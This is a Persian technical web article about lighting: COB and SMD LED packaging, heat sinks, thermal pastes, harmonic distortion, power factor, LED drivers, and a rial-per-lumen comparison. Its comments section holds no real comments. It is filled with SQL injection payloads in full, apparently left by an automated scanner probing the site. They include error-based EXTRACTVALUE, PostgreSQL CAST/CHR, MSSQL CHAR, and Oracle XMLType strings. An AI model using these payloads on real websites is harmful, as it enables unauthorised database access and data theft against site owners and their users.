نور و ملحقات (بخش سوم)

نور و ملحقات (بخش سوم)

تشریح فناوری

فناوری تراشه روی بُرد یا Chip-on-Board که به اختصار COB نامیده می شود،فناوری

 پکیجینگ دیگری برای LED است که به بازار عرضه شده است. در این فناوری، چندین تراشۀ LED توان

پایین با آرایش سری و موازی شده با یکدیگر در یک بسته بندی به گون های قرار می گیرند که مستقیماً روی

هیت سینک قابل نصب اند و نیازی به مونتاژ روی MCPCB نخواهند داشت.در زیر لایۀ مورداستفاده در این

 فناوری از آلومینیوم، سرامیک و...(با کمک گریس انتقال حرارت یا خمیر سیلیکون)(Thermal Silicone) جهت دفع گرما استفاده می شود.

تنوع در جریان و ولتاژ ماژول های LED ساخته شده با این فناوری از مزیت های آن محسوب می شود.

در شکل مقابل نمونه ای از بسته بندی LED ها با فناوری COB نشان داده شده است.تولید محصولات

روشنایی با این فناوری افزایش یافته و خطاهای حین تولید نیز به علت کاهش تعداد قطعات مونتاژی کاهش مییابد.

همچنین به علت حذف مقاومت حرارتی ناشی از برد الکترونیکی با زیر لایۀ آلومینیومی در محصولات مبتنی

بر این فناوری، مقاومت حرارتی کمتری در مسیر انتقال حرارت LED است و درنتیجه، دفع گرما با

هیت سینک های کم حج متر و با وزن کمتر صورت می پذیرد.  شایان ذکر است، در LED های ساخته شده با

فناوری COB قابلیت دستیابی به مقاومت حرارتی ای بسیار کمتر از مقاومت حرارتی درفناوری SMD وجود دارد.

از دیدگاه نور گسیل شده از LED های با فناوری COB ، این نکته قابل ذکر است که نور گسیل شده در این

LED ها دارای یکنواختی وهمگنی بیشتری در مقایسه با نور گسیل شده از چیدمان L ED هایی با فناوری

SMD است، ولی خیرگی احتمالی به علت تمرکز پرتوهای نوری در فناوری COB را برای طراحی لامپ و چراغ باید جدی گرفت.

برای توضیح این موضوع تفاوت نور گسیل شدۀ ماژول LED ساخته شده از یک پکیج COB با ماژول LED تشکیل شده

از LED های SMD در شکل زیر نشان داده شده است. در این شکل نور گسیل شده از SMD ها به صورت حلقه ای با نقاط نورانی مشاهده می شود.

لذا برای ایجاد یکنواختی بیشتر در نور تابیده شده به صفحهٔ پخش کنندۀ با قابلیت پخش کنندگی بیشتر و درنتیجه

تلفات بیشتری نیاز است که می تواند به کاهش بهرهٔ نوری محصول نهایی منجر شود.

COB با فناوری  LED نمونه ای از پکیج

نمونه ای از پکیج LED با فناوری COB

 

از نظر نصب لنز و تلفات اپتیکی نیز L ED های COB نسبت به L ED های SMD برتری قابل توجهی دارند.

زیرا در فناوری COB ، در سطح مقطع بسیار کوچک تری نور بیشتری قابل تولید است و به علت اینکه

پرتوهای نوری تابیده شده از سطح از دهانهٔ لنز عبور می کنند،تلفات اپتیکی کاهش می یابد.این در حالی است

که در محصول LED ساخته شده از فناوری ،SMD بخشی از پرتوهای خارج شده از سطح ماژول LED به

جای عبور از دهانهٔ لنز، از کناره های لنز عبور می کنند که این موضوع منجر به افزایش تلفات اپتیکی شده و

بخشی از نور تابیده شده از ماژول LED به این شکل تلف می شود.

SMD

 

مقایسه مقاومت حرارتی LED با فناوری SMD و COB

در شکل بالا تفاوت عبور پرتوهای نوری از لنز در دو فناوری COB و SMD نشان داده شده است.

لازم به ذکر است، با توسعۀ فناوری COB بسته بندی های MCOBشامل چند پکیج سری شدۀ COB نیز

به بازار روشنایی عرضه شده است که برای کاربردهای با شار نوری بالا مورداستفاده قرار می گیرد.

SMD از نوع  LED با چندین  COB تفاوت نور گسیل شده از یک

تفاوت نور گسیل شده از یک COB با چندین LED از نوع SMD

 

SMDوCOB  تفاوت عبور پرتورهای از لنز در دو فناوری

تفاوت عبور پرتورهای از لنز در دو فناوری COB و SMD

 

 

هیت سینک(گرما گیر) و TIM (مادهٔ میانجی حرارتی) 

هیت سینک یا گرما گیر، یک مبدّل حرارتی است که حرارت تولیدشده در تجهیزات الکترونیکی و مکانیکی را

منتقل می کند و با پرا کنده کردن حرارت، افزایش دما را در وسیلهٔ موردنظر کنترل می کند.

هیت سینک برای قطعات نیمه رسانای توان بالا مانند ترانزیستورها و قطعات اُپتوالکترونیک مانند لیزرها و

ال ای دی ها که توانایی پرا کنش گرمای کافی ندارند به کار برده می شوند تا دمای آن ها تنظیم شود.

هیت سینک ها حرارت را از تجهیزات جذب می کنند و با بیشینه کردن سطح تماس با سیال اطرافشان، حرارت را به سیال منتقل می کنند.

روش های نصب هیت سینک و نوع مواد میانجی نیز دمای دای( Die) و مدار یکپارچه (IC) را تحت تأثیر قرار می دهند.

چسب یا خمیر حرارتی با پر کردن حفره های هوای بین هیت سینک و پخش کنندۀ گرمایی(Heat Spreader)

 روی قطعه،عملکرد آن را بهبود می بخشند. معمولاً هیت سینک از جنس آلومینیوم یا مس ساخته می شود.

اصل انتقال حرارت

برای درک اصل انتقال حرارت باید قانون رسانش گرمای فوریه را در نظر بگیریم.قانون رسانش گرمای

فوریه نشان می دهد هنگامی که در جسمی افت دما رخ می دهد،گرما از ناحیهٔ دارای دمای بالاتر به ناحیۀ

دارای دمای پایی نتر منتقل می شود. آهنگ انتقال گرما از طریق رسانش، متناسب با حاصل ضرب افت دما در

مساحت سطح مقطعی است که گرما از آن منتقل می شود.

اگر جریان هوا یا سیال دیگری در اطراف هیت سینک نباشد، انرژی گرمایی نمی تواند منتقل شود.

جریان طبیعی همرفتی نیازمند وجود جریان آزاد هوا یا سیال پیرامون یاروی هیت سینک است.

عوامل مؤثر در طراحی هیت سینک
مقاومت حرارتی

 برای قطعات نیمه رسانای مورداستفاده در انواع دستگاه های مصرفی والکترونیک، مفهوم مقاومت حرارتی انتخاب هی تسینک را آسان می کند.

جریان گرمای بین دایِ نیمه رسانا و هوای محیط به شکل یک سری مقاومت در برابر جریان گرما مدلسازی

شده است؛ یک مقاومت مابین دای (die) و بدنۀ قطعه، یک مقاومت مابین بدنه و هیت سینک، و مقاومتی دیگر

مابین هیت سینک و هوای محیط وجود دارد. جمع این مقاومت ها مقاومت حرارتی کل از دای تا هوای محیط را به دست می دهد.

مقاومت حرارتی به صورت افزایش دما در هر واحد نیرو تعریف می شود و به صورت واحد درجۀ سلسیوس بر وات (° C/W) بیان می شود.

اگر پراکنش قطعه در مقیاس وات معلوم باشد و مقاومت حرارتی کل قطعه محاسبه شده باشد، آنگاه افزایش دمای دای به هوای محیط قابل محاسبه است.

مفهوم مقاومت حرارتی هیت سینک نیمه رسانا حدودی است زیرا توزیع نامتقارن (غیریکنواخت) گرما در

سراسر قطعه یا هیت سینک را به حساب نمی آورد. تنها سیستمی که در تعادل حرارتی قرار دارد را مدلسازی

می کند و تغییرات دما در طول زمان را به حساب نمی آورد.

همچنین غیرخطی بودن روند تابش و همرفت را در ارتباط با افزایش دما منعکس نمی کند.

با این حال تولیدکنندگان اندازه های متداول مقاومت حرارتی هیت سینک ها و قطعات نیمه رسانا را جدول بندی

می کنند تا انتخاب هیت سینک های تجاری آسان شود.هیت سینک هایی آلومینیومیِ اکستروژن شده برای

مصرف تجاری، مقاومت حرارتی (هیت سینک به هوای محیط) بین ° ۰ C/W . ۴ برای هیت سینک های

بزرگ، تا۸۵ C/W° برای هیت سینک های بسیار کوچک دارند. بسته به اندازهٔ بدنه و استفاده از خمیر یا

واشر میکای عایق ساز، نقطۀ تماس بین بدنۀ قطعه و هیت سینک ممکن است مقاومت حرارتی ای بین ۰. ۵ تا ° ۱ C/W . ۷ داشته باشد.

مواد

متداول ترین مواد مورداستفاده در هیت سینک آلیاژهای آلومینیوم هستند. آلیاژ آلومینیوم ۱۰۵۰ یکی از بالاترین

رسانش حرارتی ها را با ۲۲۹ W/mK دارد، اما به لحاظ مکانیکی نرم است. معمولاً از آلیاژهای آلومینیوم

۶۰۶۰ (کشش پایین)، ۶۰۶۱ و ۶۰۶۳ با رسانش حرارتی های به ترتیب ۱۶۶ و ۲۰۱ W/mK برای ساخت هیت سینک استفاده می شود.

این مقادیر به برگشت دادن آلیاژ بستگی دارند. هیت سینک های آلومینیومی یک تکه به روش اکستروژن، ریخته گری یا تراشکاری ساخته می شوند.

نمونه هیت سینک

آرایش پره ها

هیت سینک با پره های میله ای، هیت سینکی است که میله هایی برآمده از پایۀ هیت سینک دارد.

این میله ها می توانند استوان های، بیضوی یا مربعی باشند.هیت سینک میل های یکی از متداول ترین هیت سینک های موجود در بازار است.

نوع دوم آرایش پره های هیت سینک پره های صاف است. این پره ها در سراسر طول هیت سینک قرار گرفته اند.

تنوع دیگر پره های صاف، هیت سینک با برش مقطعی است؛یک هیت سینک با پره های صاف که در فواصل منظم برش خورده است.

به طور کلی هرچه مساحت سطحی هیت سینک بیشتر باشد، بهتر کار می کند، اگرچه این موضوع در همهٔ صادق نیست.

ایدۀ هیت سینک میل های این است که در یک حجم معلوم تا جای ممکن مساحت سطحی گنجانده شود. همچنین آرایش پره ها در همۀ جهات ممکن است.

اما آزمایشات نشان داده اند که عملکرد هیت سینک میله ای فقط وقتی به طرز معناداری بهتر از هیت سنک با

پره های صاف است که ماده ی سیال در راستای محور میله ها جریان یابد و نه این که به صورت مماس از میان میله هاعبور کند.

TIM (ماده میانجی حرارتی) 

خمیر سیلیکون یک رسانای گرمایی است که بین دو شیء فلزی مورداستفاده قرار می گیرد و معمولاً این دو

شیء سیستم خنک کننده یا Heat Sink و منبع حرارتی مانند LED یا برد هستند.

با استفاده از این خمیرْ حرارت از منبع حرارتی به هیت سینک منتقل می شود. زمانی که این خمیر بین هیت سینک و منبع حرارتی قرار می گیرد.

کلیهٔ حفره های میکروسکوپی که روی دو سطح قرار دارد را پر می کند، حبس شدن هوا در این حفره ها باعث

عدم انتقال حرارت مؤثر می شود، زیرا هوا برای گرما رسانای ضعیفی است.

خمیر سیلیکون که اینجا به عنوان میانجی حرارتی Thermal Interface شناخته می شود یک رسانای

گرمایی بسیار خوب است که تا صد برابر هوا می تواند گرما را منتقل کند.

به این میانجی حرارتی هما نطور که اشاره شد TIM یا Thermal Interface Materials گفته می شود.

سطوح منبع حرارتی و هیت سینک به ظاهر صاف هستند، اما درواقع حفره های میکروسکوپی روی آن ها

وجود دارد که بایستی با TIM یا همان خمیر سیلیکون پر شوند.

انواع خمیرهای حرارتی

در ایران خمیر حرارتی با نام خمیر سیلیکون شناخته می شود، اما درواقع انواع مختلفی از خمیرهای حرارتی وجود دارد که

خمیر سیلیکون یا Silicon Paste صرفاً یکی از انواع این خمیرهاست و انواع دیگری از این محصولات نیز وجود دارد.

ب هطور کلی سه نوع خمیر حرارتی وجود دارد:
1- بر پایهٔ فلز یا Metal Based :

با توجه به اینکه در ترکیبات این میانجی حرارتی از فلز استفاده می شود، بیشترین

انتقال حرارت و بیشترین کارایی را دارد. این میانجی حرارتی درواقع یک نوع گریس خاص است که در آن

ذرات بسیار ریز فلز وجود دارد. البته این نوع از خمیر حرارتی همیشه مورد استفاده قرار نمی گیرد؛ یکی از

معایب این نوع خمیر این است که فلز علاوه بر رسانایی حرارتی، رسانایی الکتریکی نیز دارد و می تواند بین هیت سینک و بُرد یا LED اتصال ایجاد کند.

2- بر پایهٔ سرامیک یا Ceramic Based :

این میانجی حرارتی نیز مانند میانجی های فلزی کاربرد فراوانی دارد، اما کارایی آن به خوبی فلز نیست.

معمولاً بین میانجی های فلزی و سرامیکی اختلاف انتقال حرارتی بین 1 تا 3 درجه سانتیگراد وجود دارد.

این میانجی حرارتی نیز مانند میانجی فلزی یک گریس یا خمیر است که در آن ذرات بسیار ریز سرامیک وجود دارد.

یکی از نقاط قوت این نوع خمیر این است که سرامیک رسانای الکتریکی نیست و بنابراین مشکلات ناشی از رسانای الکتریکی به وجود نخواهد آمد.

۳- بر پایهٔ سیلیکون یا Silicon Based :

اینگونه میانجی ها معمولاً در نوارهای حرارتی یا Thermal Pad ها استفاده می شوند و کاربردشان به

گستردگی دو مورد پیشین نیست. این نوع از میانجی ها که به عنوان خمیر سیلیکون نیز شناخته می شوند

کارایی مناسبی دارند، اما کیفیت آن ها پایین تر از دو مورد قبلی است و معمولاً با یک سیستم خنک کننده یا Cooling Kit ارائه می شوند.

همچنین یک نوع اپوکسی (چسب) حرارتی نیز وجود دارد که تقریباً همان کاربرد گریس ها یا خمیرهای

حرارتی را دارد با این تفاوت که همانطور که از نامش پیداست برای چسباندن دائمی منبع حرارتی به هیت سینک استفاده می شود.

اغلب استفاده از چنین چسبی پیشنهاد نمی شود، اما گاهی نا گزیر به استفاده از آن خواهیم بود.

تأثیر روی امواج رادیویی

اعوجاج هارمونیک کل (THD: Total Harmonic distortion) یک پارامتر کیفی و نمایانگر آن است که

یک شکل موج یا سیگنال تا چه حدی منطبق بر شکل موج سینوسی است.

مقدار THD برحسب درصد بیان شده است و هر چه میزان THD کمتر باشد شکل موج سینوسی کیفیت

بهتری دارد و تلفات انرژی کمتری روی شبکه برق خواهد داشت. هارمونیک ها مؤلفه هایی با فرکانس بالاتر

از فرکانس مؤلفه اصلی (50 Hz) در یک شکل موج (جریان الکتریکی) هستند که در شبکهٔ قدرت، ب هطور

ناخواسته و بر اثر بارهای غیرخطی (Nonlinear Loads) تولید می شوند.

درصد THD محصولات روشنایی در بازهٔ 5 الی 200 درصد متغیر است. هرچه این درصد پایین تر باشد، نشان

از کیفیت بالاتر آن محصول در مورد تولید اعوجاج هارمونیک است.

به کارگیری فیلترهای هارمونیک ، (PFC: Power Factor Correction شنت و...) در مدار درایور

محصولات، می تواند به اصلاح ضریب هارمونیک منجر شود. ب هکارگیری المان ها و بارهای غیرخطی در

سیستم است که باعث ایجاد سیگنال های غیرسینوسی جریان و ولتاژ در شبکه قدرت می شود.

این امر خود موجب پیدایش اعوجاج در موج اصلی جریان خواهد شد. با گسترش بارهای غیرخطی، اعوجاج

ولتاژ در سیستم های قدرت شکل می گیرد که با انتقال از منبع به سمت بارها میزان آن افزایش می یابد. 

کلی عوامل اصلی تولیدکنندهٔ هارمونیک ها عبارت اند از:

    مبدل های الکترونیکی مانند یکسوسازها و اینورترها.

    تجهیزات تخلیه ای مانند لامپ های فلورسنت و با فشار گاز بالا مانند بخار سدیم 

    شارژهای باتری، مبدل های فرکانسی، درایورها

بررسی تأثیر زیان بار هارمونیک ها را می توان در دو دسته کلی هارمونیک های جریان و ولتاژ تقسیم کرد.

هارمونیک ها باعث افزایش جریان خازن ها، تلفات در ترانسفورمرها، موتورها، هادی ها و اختلال در عملکرد سیستم های کنترل، حفاظتی و ارتباطی می شوند.

هارمونیک های ایجاد شده توسط بارهای غیرخطی می توانند روی بارهای مرتبط در محل اتصال تأثیر زیادی بگذارند.

همچنین هارمونیک ها باعث عملکرد نامناسب رله ها، کلیدها، فیوزها و سیست مهای فرمان از راه دور می شوند.

درنتیجه گیری کلی می توان اثرات هارمونیک ها را به چهار دسته اصلی تقسیم کرد:

     ۱. اثرات برعایق های تجهیزات

     2. اثرات گرمایی بر تجهیزات

     3. عملکرد نامناسب تجهیزات شبکه قدرت و اتلاف انرژی

     4. تأثیر روی مدارهای ارتباطی

ضریب توان Power Factor

ضریب توان در یک سیستم الکتریکی به معنی نسبت توان واقعی به توان ظاهری است و مقدار آن بین ۰ تا ۱ است.

توان واقعی درواقع توانایی یک مصرف کننده برای تبدیل انرژی الکتریکی به دیگر شکل های انرژی را بیان می کند

درحالی که توان ظاهری در اثر وجود اختلاف بین ولتاژ و جریان به وجود می آید.

به طور کلی در یک مدار AC مصرف کننده ها از نظر نوع مصرف انرژی الکتریکی به دو دسته تقسیم می شوند:

    • مصرف کننده های اکتیو (مقاومتی) .

    • مصرف کننده های راکتیو (خازنی یا سلفی).

مدارهایی که شامل مصرف کننده های کاملاً مقاومتی هستند (مانند لامپ های رشت های، بخاری های برقی، اجاق های برقی و...)

ضریب توانِ یک دارند (زاویهٔ فاز صفراست، لذا کسینوس صفر ، یک می شود و مقدار توان اکتیو و ظاهری باهم برابر خواهد بود)

درحالی که در مدارهای بارهای راکتیو (مانند خازن ها، موتورها، ترانسفورماتورها و. . ) ضریب توان کمتر از یک است.

بارهای راکتیو (Reactive Loads) علی رغم اینکه سبب افت ولتاژ می شوند و از منبع،جریان می کِشند، توان مفیدی صرف نمی کنند؛

 زیرا توانی که از منبع می کشند کاری انجام نمی دهد و آن را به منبع باز می گردانند.این مورد، به علت ماهیت بارهای راکتیو است.

چراغ های روشنایی LED قطعهٔ تأثیرگذار بر ضریب توان درایور آن است که در اثر سلفی بودن آن و عدم

اصلاح خاصیت سلفی در درایور، ضریب توان کمتر از 1 خواهد بود.

یکی از مهم ترین پارامترهای بررسی کیفیت یک درایور، ضریب توان چراغ است.

در درایورهای LED با مدارهای اصلاح ضریبِ توان می توان به یک عدد مناسب دست یافت، اما در

درایورهای چراغ های توان پایین، متأسفانه بسیاری از تأمین کننده ها از ضریب توان کمتری برخوردارند.

توان راکتیو معمولاً منجر به مبالغ بالای قبوض برق مصر فکنندگان (به ویژه صنعتی) می شود.

 دلیل این موضوع آن است که شرکت های برق مصرف را برحسب توان ظاهری محاسبه می کنند.

برخی شرکت های برق نیز، مصرف کنندگان را در صورت مصرف توان راکتیو جریمه می کنند؛ زیرا ممکن است به اضافه بار سیستم منجر شوند.

درایور

درایور LED به تجهیزی گفته می شود که با تبدیل ولتاژ AC ورودی به DC ، با توجه به تعداد LED های سری و موازی،

ولتاژ و جریان موردنظر را برای راه اندازی منبع نوری اعمال می کند.

دو توپولوژی اصلی در طراحی درایورهای LED:

1- روش سوئیچیگ فلای بک

2- روش سوئیچینگ باک

درایورها به دو دستۀ اصلی جریان ثابت (constant-current) و ولتاژ ثابت (constant-voltage) تقسیم می شوند،

و یک دستهٔ دیگر وجود دارد به نام درایور LED AC Driver (AC LED) که مورد بحث قرار خواهد گرفت.

هرکدام از آن ها برای کار با LED هایی با الزامات الکتریکی متفاوت طراحی شده اند.

درایورهای جریان ثابت در این درایورها، LED ها نیاز به جریانی ثابت و طیفی از ولتاژ هستند.

در این درایورها جریان ثابتی برحسب میلی آمپر یا آمپر که روی بدنه درایور مشخص شده است خواهیم داشت

و طیفی از ولتاژ که براساس توان LED ها تعیین می شود. به طور مثال یک درایور می تواند جریان ثابت

۷۰۰ میلی آمپر را داشته باشد، اما ولتاژ بین ۳ تا ۱۴ ولت متغیر باشد.

در این درایورها، LED ها نیاز به ولتاژی ثابت و حدا کثر جریان خروجی هستند. در این LED ها جریان

توسط یک مقاوت ساده یا درایور جریان ثابت داخلی ماژول LED تنظیم می شود.

این LED ها معمولاً به ولتاژ پایدار ۱۲ یا ۲۴ ولتی نیاز دارند. به طور مثال یک درایور ۲۴ ولت DC

(100 تا 240 وات ) می تواند تا 4 تا ۱۰ آمپر جریان خروجی داشته باشد.

درایورهای PSR

امروزه درایور LED با تکنولوژی PSR طراحی م یشود. این تکنولوژی تلورانس مناسب،

پایداری بالا، طول عمر بالا و قیمت مناسب به همراه دارد و با توا نهای مختلف هستند.

برخی از درایورها قابلیت برنامه ریزی و برخی قابلیت کنترل نور را دارند.

درایورهای PSR از نظر طراحی به دو دسته زیر تقسیم می شوند:
1- درایورهای ایزوله:

در این نوع ولتاژ خروجی از برق شهر ایزوله است، لذا در صورت تماس با خروجی درایور خطر برق

گرفتگی وجود ندارد. معمولاً ولتاژ خروجی درایورهای ایزوله کمتر از 120 است.

2- درایورهای غیرایزوله:

در این نوع، ولتاژ برق شهر از خروجی ایزوله نیست و در صورت تماس با خروجی خطر برق گرفتگی وجود دارد.

معمولاً این نوع درایور با ولتاژ خروجی بالا تولید می شود و نسبت به درایورهای ایزوله پایداری و ایمنی کمتری داشته و قیمت آن نیز ارزانتر است.

درایور های جریان ثابت

شاخص ریال بر لومن

برای انتخاب چراغ و یا لامپ برحسب نیاز شاخص های زیادی مانند طول عمر، حفظ شار نوری، زاویه پخش

نور، درجهٔ حفاظت IP و IK و... بایستی در نظر گرفته شود. امروزه یکی از شاخص های اقتصادی که

شرکت های معتبر مطرح می کند بحث ریال بر لومن است. درواقع مصرف کننده به مقدار نور (با کیفیت و ماندگار) پول پرداخت می کند.

برای روشن شدن موضوع یک مثال مطرح می شود. سه چراغ A,B,C در نظر گرفته می شود که هر سه

100 وات هستند و به عبارتی هر سه به یک میزان انرژی مصرف می کنند.

قیمت ریال بر لومن

در نگاه اول چراغ A اقتصادی به نظر می رسد. در صورتی که با انتخاب چراغ A به ازای هر لومن، 325 ریال پرداخت می شود

و این مقدار برای چراغ 300 ،B ریال بر لومن و برای چراغ 333 ، C ریال بر لومن است.

به عبارتی چراغ B اقتصادی تر است. ضمن اینکه با در دست داشتن میزان نور موردنیاز از وات های پایین

سری چراغ های B,C می توان انتخاب کرد تا هم به مقدار نور مورد انتظار رسید و هم بهای برق کمتری پرداخت کرد.

 

 

  پانویس و منابع

_________________________________________________________________________________________________________________________________________________        

1. Multi Chip On Board

1-برگرفته از فصل دوم کتاب مروری برمفاهیم روشنایی،نورپردازی و تجهیزات مرتبط

 

 

نظرات

eMrh eMrh

tgYS


eMrh eMrh

tgYS


eMrh,(,))..'(" eMrh,(,))..'("

tgYS


eMrh'bSMrHg<'">uFUvvP eMrh'bSMrHg<'">uFUvvP

tgYS


eMrh') AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) AND ('zBJs'='zBJs eMrh') AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) AND ('zBJs'='zBJs

tgYS


eMrh' AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) AND 'Zxsm'='Zxsm eMrh' AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) AND 'Zxsm'='Zxsm

tgYS


eMrh) AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) AND (6254=6254 eMrh) AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) AND (6254=6254

tgYS


eMrh AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71)) eMrh AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71))

tgYS


eMrh AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71))-- wiME eMrh AND EXTRACTVALUE(9446,CONCAT(0x5c,0x7171627871,(SELECT (ELT(9446=9446,1))),0x7171786b71))-- wiME

tgYS


eMrh') AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND ('cnkO'='cnkO eMrh') AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND ('cnkO'='cnkO

tgYS


eMrh' AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND 'bgve'='bgve eMrh' AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND 'bgve'='bgve

tgYS


eMrh) AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND (2137=2137 eMrh) AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) AND (2137=2137

tgYS


eMrh AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC) eMrh AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)

tgYS


eMrh AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)-- Dpbn eMrh AND 6278=CAST((CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (6278=6278) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)) AS NUMERIC)-- Dpbn

tgYS


eMrh') AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND ('chWP'='chWP eMrh') AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND ('chWP'='chWP

tgYS


eMrh' AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'WpGk'='WpGk eMrh' AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND 'WpGk'='WpGk

tgYS


eMrh) AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND (7989=7989 eMrh) AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) AND (7989=7989

tgYS


eMrh AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113))) eMrh AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)))

tgYS


eMrh AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)))-- kIbf eMrh AND 3114 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3114=3114) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(113)))-- kIbf

tgYS


eMrh') AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('jmgw'='jmgw eMrh') AND 5502=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5502=5502) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND ('jmgw'='jmgw

tgYS


